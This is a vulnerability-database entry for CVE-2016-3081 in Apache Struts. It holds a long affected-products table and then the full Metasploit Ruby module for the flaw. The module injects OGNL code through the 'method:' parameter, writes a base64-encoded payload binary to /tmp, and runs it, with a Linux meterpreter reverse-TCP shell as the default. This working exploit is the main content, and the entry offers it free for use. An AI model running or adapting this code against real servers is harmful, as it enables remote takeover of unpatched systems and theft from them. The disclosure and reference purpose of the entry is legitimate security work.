ID
VAR-E-201604-0126
CVE
| cve_id: | CVE-2016-3081 | Trust: 3.0 |
EDB ID
39756
TITLE
Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit) - Linux remote Exploit
Trust: 0.6
DESCRIPTION
Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit). CVE-2016-3081 . remote exploit for Linux platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | apache | model: | struts | scope: | - | version: | - | Trust: 1.6 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.1.1 | Trust: 0.6 |
| vendor: | apache | model: | struts dynamic method invocation | scope: | eq | version: | 2.3.28 | Trust: 0.5 |
| vendor: | oracle | model: | siebel apps e-billing | scope: | eq | version: | -7.1 | Trust: 0.3 |
| vendor: | oracle | model: | micros retail xbri loss prevention | scope: | eq | version: | 10.8.1 | Trust: 0.3 |
| vendor: | oracle | model: | micros retail xbri loss prevention | scope: | eq | version: | 10.8 | Trust: 0.3 |
| vendor: | oracle | model: | micros retail xbri loss prevention | scope: | eq | version: | 10.7 | Trust: 0.3 |
| vendor: | oracle | model: | micros retail xbri loss prevention | scope: | eq | version: | 10.6 | Trust: 0.3 |
| vendor: | oracle | model: | micros retail xbri loss prevention | scope: | eq | version: | 10.5 | Trust: 0.3 |
| vendor: | oracle | model: | micros retail xbri loss prevention | scope: | eq | version: | 10.0.1 | Trust: 0.3 |
| vendor: | oracle | model: | flexcube private banking | scope: | eq | version: | 12.1 | Trust: 0.3 |
| vendor: | oracle | model: | flexcube private banking | scope: | eq | version: | 12.0.3 | Trust: 0.3 |
| vendor: | oracle | model: | flexcube private banking | scope: | eq | version: | 12.0.2 | Trust: 0.3 |
| vendor: | oracle | model: | flexcube private banking | scope: | eq | version: | 12.0.1 | Trust: 0.3 |
| vendor: | oracle | model: | flexcube private banking | scope: | eq | version: | 2.2 | Trust: 0.3 |
| vendor: | oracle | model: | flexcube private banking | scope: | eq | version: | 2.0.1 | Trust: 0.3 |
| vendor: | oracle | model: | flexcube private banking | scope: | eq | version: | 2.0 | Trust: 0.3 |
| vendor: | ibm | model: | infosphere metadata workbench | scope: | eq | version: | 9.1 | Trust: 0.3 |
| vendor: | ibm | model: | infosphere metadata workbench | scope: | eq | version: | 8.7 | Trust: 0.3 |
| vendor: | ibm | model: | infosphere metadata workbench | scope: | eq | version: | 8.5 | Trust: 0.3 |
| vendor: | ibm | model: | infosphere information server | scope: | eq | version: | 9.1 | Trust: 0.3 |
| vendor: | ibm | model: | infosphere information server | scope: | eq | version: | 8.7 | Trust: 0.3 |
| vendor: | ibm | model: | infosphere information server | scope: | eq | version: | 8.5 | Trust: 0.3 |
| vendor: | ibm | model: | infosphere information server | scope: | eq | version: | 11.5 | Trust: 0.3 |
| vendor: | ibm | model: | infosphere information server | scope: | eq | version: | 11.3 | Trust: 0.3 |
| vendor: | ibm | model: | infosphere information governance catalog | scope: | eq | version: | 11.5 | Trust: 0.3 |
| vendor: | ibm | model: | infosphere information governance catalog | scope: | eq | version: | 11.3 | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor onebox v100r003c10 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor n8500 v200r001c91spc901 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor n8500 v200r001c91spc900 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor n8500 v200r001c91spc205 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor n8500 v200r001c91 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor n8500 v200r001c09spc505 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor n8500 v200r001c09 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor v300r005c00 | scope: | eq | version: | 9000 | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor v100r001c30 | scope: | eq | version: | 9000 | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor v100r001c01 | scope: | eq | version: | 9000 | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor | scope: | eq | version: | 5800v30 | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor v300r003c00 | scope: | eq | version: | 5300v3 | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor v300r002c10 | scope: | eq | version: | 5300v3 | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor v300r001c20 | scope: | eq | version: | 5300v3 | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor v300r003c10 | scope: | eq | version: | 18800 | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor v300r003c10 | scope: | eq | version: | 18500v3 | Trust: 0.3 |
| vendor: | huawei | model: | logcenter v100r001c20 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | firehunter6000 v100r001c20 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | anyoffice v200r006c00 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | anyoffice v200r005c00 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | agile controller-campus v100r002c00 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.28 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.24 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.41 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.4 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.2.3 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.2.11 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.2 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.1.8.1 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.1.8 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.1.6 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.1.5 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.1.2 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.1 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.0.14 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.0.12 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.0.11.1 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.0.11 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.0.10 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.0.9 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.0.8 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.0.7 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.0.6 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.0.5 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.0.4 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.0.3 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.0.2 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.0.1 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.0 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.8 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.7 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.20.1 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.20 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.16.3 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.16.2 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.16.1 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.16 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.15.3 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.15.2 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.15.1 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.15 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.14.3 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.14.2 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.14.1 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.14 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.1.2 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.1.1 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.3.1 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.2.3.1 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.1.4 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.1.3 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | eq | version: | 2.0.13 | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor onebox v100r005c00 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor n8500 v200r001c91spc902 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor n8500 v200r001c09spc506 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor v300r003c10 | scope: | ne | version: | 6800v3 | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor v300r003c10 | scope: | ne | version: | 5800v3 | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor v300r003c10 | scope: | ne | version: | 5800 | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor v300r003c10 | scope: | ne | version: | 5600 | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor v300r003c10 | scope: | ne | version: | 5500 | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor v300r003c10 | scope: | ne | version: | 5300 | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor v300r003c10spc100 | scope: | ne | version: | 18800v3 | Trust: 0.3 |
| vendor: | huawei | model: | oceanstor v300r003c10spc100 | scope: | ne | version: | 18500v3 | Trust: 0.3 |
| vendor: | huawei | model: | logcenter v100r001c20spc102 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | firehunter6000 v100r001c20spc106t | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | anyoffice emm v200r006c00spc101 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | agile controller-campus v100r002c00spc107 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | huawei | model: | agile controller-campus v100r002c00spc106t | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | ne | version: | 2.3.24.2 | Trust: 0.3 |
| vendor: | apache | model: | struts | scope: | ne | version: | 2.3.20.2 | Trust: 0.3 |
EXPLOIT
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts Dynamic Method Invocation Remote Code Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache Struts
version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code
Execution can be performed via method: prefix when Dynamic Method Invocation
is enabled.
},
'Author' => [ 'Nixawk' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-3081' ],
[ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ]
],
'Platform' => %w{ linux },
'Privileged' => true,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp_uuid'
},
'Targets' =>
[
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
]
],
'DisclosureDate' => 'Apr 27 2016',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']),
OptString.new('TMPPATH', [ false, 'Overwrite the temp path for the file upload. Needed if the home directory is not writable.', nil])
], self.class)
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def send_http_request(payload)
uri = normalize_uri(datastore['TARGETURI'])
res = send_request_cgi(
'uri' => "#{uri}#{payload}",
'method' => 'POST')
if res && res.code == 404
fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
end
res
end
def parameterize(params) # params is a hash
URI.escape(params.collect { |k, v| "#{k}=#{v}" }.join('&'))
end
def generate_rce_payload(code, params_hash)
payload = "?method:"
payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS")
payload << ","
payload << Rex::Text.uri_encode(code)
payload << ","
payload << Rex::Text.uri_encode("1?#xx:#request.toString")
payload << "&"
payload << parameterize(params_hash)
payload
end
def temp_path
@TMPPATH ||= lambda {
path = datastore['TMPPATH']
return nil unless path
unless path.end_with?('/')
path << '/'
end
return path
}.call
end
def upload_file(filename, content)
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
var_c = rand_text_alpha_lower(4)
var_d = rand_text_alpha_lower(4)
code = "##{var_a}=new sun.misc.BASE64Decoder(),"
code << "##{var_b}=new java.io.FileOutputStream(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_c}[0]))),"
code << "##{var_b}.write(##{var_a}.decodeBuffer(#parameters.#{var_d}[0])),"
code << "##{var_b}.close()"
params_hash = { var_c => filename, var_d => content }
payload = generate_rce_payload(code, params_hash)
send_http_request(payload)
end
def execute_command(cmd)
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
var_c = rand_text_alpha_lower(4)
var_d = rand_text_alpha_lower(4)
var_e = rand_text_alpha_lower(4)
var_f = rand_text_alpha_lower(4)
code = "##{var_a}=@java.lang.Runtime@getRuntime().exec(#parameters.#{var_f}[0]).getInputStream(),"
code << "##{var_b}=new java.io.InputStreamReader(##{var_a}),"
code << "##{var_c}=new java.io.BufferedReader(##{var_b}),"
code << "##{var_d}=new char[1024],"
code << "##{var_c}.read(##{var_d}),"
code << "##{var_e}=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
code << "##{var_e}.println(##{var_d}),"
code << "##{var_e}.close()"
cmd.tr!(' ', '+') if cmd && cmd.include?(' ')
params_hash = { var_f => cmd }
payload = generate_rce_payload(code, params_hash)
send_http_request(payload)
end
def linux_stager
payload_exe = rand_text_alphanumeric(4 + rand(4))
path = temp_path || '/tmp/'
payload_exe = "#{path}#{payload_exe}"
b64_filename = Rex::Text.encode_base64(payload_exe)
b64_content = Rex::Text.encode_base64(generate_payload_exe)
print_status("Uploading exploit to #{payload_exe}")
upload_file(b64_filename, b64_content)
print_status("Attempting to execute the payload...")
execute_command("chmod 700 #{payload_exe}")
execute_command("/bin/sh -c #{payload_exe}")
end
def exploit
linux_stager
end
def check
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
addend_one = rand_text_numeric(rand(3) + 1).to_i
addend_two = rand_text_numeric(rand(3) + 1).to_i
sum = addend_one + addend_two
flag = Rex::Text.rand_text_alpha(5)
code = "##{var_a}=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
code << "##{var_a}.print(#parameters.#{var_b}[0]),"
code << "##{var_a}.print(new java.lang.Integer(#{addend_one}+#{addend_two})),"
code << "##{var_a}.print(#parameters.#{var_b}[0]),"
code << "##{var_a}.close()"
params_hash = { var_b => flag }
payload = generate_rce_payload(code, params_hash)
begin
resp = send_http_request(payload)
rescue Msf::Exploit::Failed
return Exploit::CheckCode::Unknown
end
if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}")
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Dynamic Method Invocation Remote Code Execution (Metasploit)
Trust: 1.6
TAGS
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
| tag: | exploit | Trust: 0.5 |
| tag: | remote | Trust: 0.5 |
| tag: | code execution | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
| db: | SEEBUG | id: | SSVID-91389 | Trust: 3.3 |
| db: | NVD | id: | CVE-2016-3081 | Trust: 3.0 |
| db: | EXPLOIT-DB | id: | 39756 | Trust: 1.6 |
| db: | 0DAYTODAY | id: | 25271 | Trust: 0.6 |
| db: | EDBNET | id: | 85558 | Trust: 0.6 |
| db: | EDBNET | id: | 85572 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 25410 | Trust: 0.6 |
| db: | EDBNET | id: | 98206 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 136856 | Trust: 0.5 |
| db: | BID | id: | 87327 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2016-3081 | Trust: 2.7 |
| url: | https://0day.today/exploits/25271 | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/39756/ | Trust: 0.6 |
| url: | https://0day.today/exploits/25410 | Trust: 0.6 |
| url: | http://struts.apache.org/ | Trust: 0.3 |
| url: | http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html | Trust: 0.3 |
| url: | http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html | Trust: 0.3 |
| url: | http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160527-01-struts2-en | Trust: 0.3 |
| url: | http://www.huawei.com/en/psirt/security-notices/huawei-sn-20160427-01-struts2-en | Trust: 0.3 |
| url: | https://struts.apache.org/docs/s2-032.html | Trust: 0.3 |
SOURCES
| db: | BID | id: | 87327 |
| db: | PACKETSTORM | id: | 136856 |
| db: | EXPLOIT-DB | id: | 39756 |
| db: | EDBNET | id: | 85558 |
| db: | EDBNET | id: | 85572 |
| db: | EDBNET | id: | 98206 |
LAST UPDATE DATE
2022-07-27T09:42:33.004000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 87327 | date: | 2016-10-26T01:16:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 87327 | date: | 2016-04-22T00:00:00 |
| db: | PACKETSTORM | id: | 136856 | date: | 2016-04-30T04:06:34 |
| db: | EXPLOIT-DB | id: | 39756 | date: | 2016-05-02T00:00:00 |
| db: | EDBNET | id: | 85558 | date: | 2016-04-30T00:00:00 |
| db: | EDBNET | id: | 85572 | date: | 2016-05-02T00:00:00 |
| db: | EDBNET | id: | 98206 | date: | 2018-06-03T00:00:00 |